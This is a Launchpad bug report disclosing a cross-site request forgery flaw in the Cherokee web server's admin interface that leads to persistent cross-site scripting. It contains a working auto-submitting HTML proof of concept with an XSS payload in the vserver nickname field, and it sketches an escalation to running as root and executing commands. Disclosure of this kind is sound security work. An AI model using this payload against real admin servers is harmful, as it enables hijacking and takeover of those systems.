csrf & xss issue (resulting from csrf).

Bug #784632 reported by David on 2011-05-18
258
This bug affects 1 person
Affects Status Importance Assigned to Milestone
cherokee (Ubuntu)
Undecided
Unassigned

Bug Description

Binary package hint: cherokee

The cherokee admin server is vulnerable to csrf.

Using csrf it is possible to produce a persistent xss in several pages - including the 'status' page via the 'nickname field' of a vserver.
An example of this is the following:

<html>
<body>
 <form action="http://127.0.0.1:9090/vserver/apply" method="post" id="xssform">
 <input type="text" name="tmp!new_droot" value='/var/www/'></input>
 <input type="text" name="tmp!new_nick" value='" onselect=alert(1) autofocus> <embed src="javascript:alert(document.cookie)">'></input>
</form>
<script>document.getElementById("xssform").submit();</script>
</body>

A Worst case scenario could be something like the following:
If a user is logged in and the cherokee admin server is running on localhost:9090 then if they visit a $bad page - the bad page may be able to send requests to the server so as to reconfigure it to:

1. run as root
2. the logging of error(or access) will run a command ...

CVE References

David (d--) wrote :

minor fixy

description: updated
description: updated
Changed in cherokee (Ubuntu):
status: New → Confirmed
visibility: private → public
To post a comment you must log in.
This report contains Public Security information  Edit
Everyone can see this security related information.

Other bug subscribers